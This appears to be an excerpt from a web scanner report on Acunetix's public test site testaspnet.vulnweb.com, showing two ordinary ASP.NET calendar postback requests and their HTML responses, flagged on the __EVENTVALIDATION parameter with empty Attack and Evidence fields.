Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1095 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,095 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8401&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAAOiCL69oIZGRkDEF3TQOfzFIlteiFcQYPqLF2xks%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKmrKTsBwL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUQP1trexIM3NPybCToWOc69KPGbQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:58:51 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAAOiCL69oIZGRkDEF3TQOfzFIlteiFcQYPqLF2xks=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKmrKTsBwL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUQP1trexIM3NPybCToWOc69KPGbQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:White" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8497&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAA4gf7NtsIZGRkbXf%2B7KtEp0JU4XsMJTMa%2BkOFA6A%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKMy4%2FQAwLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwe5JQU4dpBFJgPk6DlA7uLjeZ05Gg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:22:15 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAA4gf7NtsIZGRkbXf+7KtEp0JU4XsMJTMa+kOFA6A=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKMy4/QAwLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwe5JQU4dpBFJgPk6DlA7uLjeZ05Gg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:White" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
